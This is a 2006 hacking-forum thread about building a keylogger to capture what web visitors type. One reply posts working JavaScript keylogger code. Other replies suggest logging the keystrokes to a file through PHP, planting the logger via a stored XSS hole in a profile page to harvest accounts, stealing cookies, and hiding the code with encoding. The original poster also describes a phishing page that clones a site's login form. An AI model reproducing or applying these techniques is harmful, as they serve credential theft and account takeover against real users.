Donate to us via Paypal!
It is the path of least resistance that makes rivers and men crooked. - Bj Palmer
Friday, April 23, 2021
Navigation
Home
 Find:
 Information:
Learn
Communicate
Submit
Shop
Challenges
 Exploit:
 Programming:
 Think:
 Track:
 Patch:
 Other:
 Need Help?
Other
Members Online
Total Online: 93
Guests Online: 92
Members Online: 1

Registered Members: 135601
Newest Member: mathewhogg
Latest Articles

View Thread

HellBound Hackers | Computer General | Hacking in general

Author

PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 03:17
As most of you are aware, there have been many phishing sites around. I know it is possible to keylog stokes on webpages using javascript but seeing as in this shows up in the page source I was wondering if it's possible to be done in PHP soley.

If you know how I would be able to do this, could you please tell me the functions I should look into. I have a basic knowledge for PHP but google doesn't teach, it tells and I'm not looking for an answer xD


Flash.


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 03:43
Err..
I am not really good in php, so I can't give you the awnser.

BUT, I have found a site with ALL the php commands, so maybe you can ctrl-f and try to search for a command and get lucky?

I have nothing to do so I will search, too.

Here's the site: http://php.about.. . .ickref.php




Edited by on 03-08-06 03:45
Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 04:04
Javascript keylogger = pretty easy to find/create.

Take this one for example:
Code
<script language="JavaScript" type="text/javascript">

winKL = window.open('log.txt','KeyLogger','directories=no,menu=no,status=no,resizable=no');
winKL.document.write('<html><body onLoad="self.blur();">');

document.onkeypress = function () {
key = window.event.keyCode;
winKL.document.write(String.fromCharCode(key));
}
self.focus();

</script>







Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 04:59
I don't see what use this would be. I mean, if you get someone to visit your site, you can see everything that they submit. And they are only going to type if they have a reason to enter data.

But if you have a reason, just combine the JS example with php's file commands and you can dump everything the user types into a file.


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 13:08
Ya well, I was hired by a site to find security holes. and it had accoutns worth hacking. i found a security hole were you edit your profile that allowed you to submit ANY javascript.

i can easily put the keylogger there and get all acounts!:happy:


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 13:18
Err, isn't that called an XSS hole. Just cookie steal.


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 14:31
Not too sure if this will help you havn't really messed with these but here ya go??

http://www.hackth. . .s/read/292


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 15:24
blackbird wrote:
Ya well, I was hired by a site to find security holes. and it had accoutns worth hacking. i found a security hole were you edit your profile that allowed you to submit ANY javascript.

i can easily put the keylogger there and get all acounts!:happy:


woo hoo... if someone visits your profile, you can log keystrokes. who is going to be typing anything on your profile page? How can yu get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.


as for doing it with PHP soley, I've been looking around. Not that I canfind. You can do it in PERL. I'd writte the keylogger in PERL (itll take a bit o fresearch, but its possible) and use that. I think PHP retty much depends on javascript for keylog functions.

You could always encode the gibberish: can't it have the same funcitonality if you write it using URL incoding? Or perhaps ascii values... i dunno. I'm not a big javascript person, but there is a way to do it.


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 21:11
Thanks for you replies people.

@Grindordie - I know the difference but wasn't aware if you could do this with PHP.

@Spyware - Thanks for the links and code etc. Much appreciated

@Deathrape - Thanks for your reply and neither am I a JS person, I know enough to get me by but not to make scripts worth having. Now is the time to get it done.


For consellation, I thought of another way it will be possible... not soley towards keylogging but to log what the user 'submits'.
EG you copy the site image to image css to css source to source and have the login in a 'submit news' form. Using URL manipiulation direct the victim to the fake page. When the user inputs the details it will be posted on another page then redirected to one from the original site.

That is just an idea if someone else was interested in this.




Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 21:16
woo hoo... if someone visits your profile, you can log keystrokes. who is going to be typing anything on your profile page? How can yu get all the accounts? No one is going to log in from your profile page. You might catch one person every blue moon. If you couldn't figure this out yourself using common sense, I feel sorry for the poor people who hired you.


obviosly u have no idea wat im talking about........


Author

RE: PHP Keylogger


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 03-08-06 22:34
well then you should obviously explain how this could be an asset. If you don't, I'll just assume you have know idea what you're talking about versus me.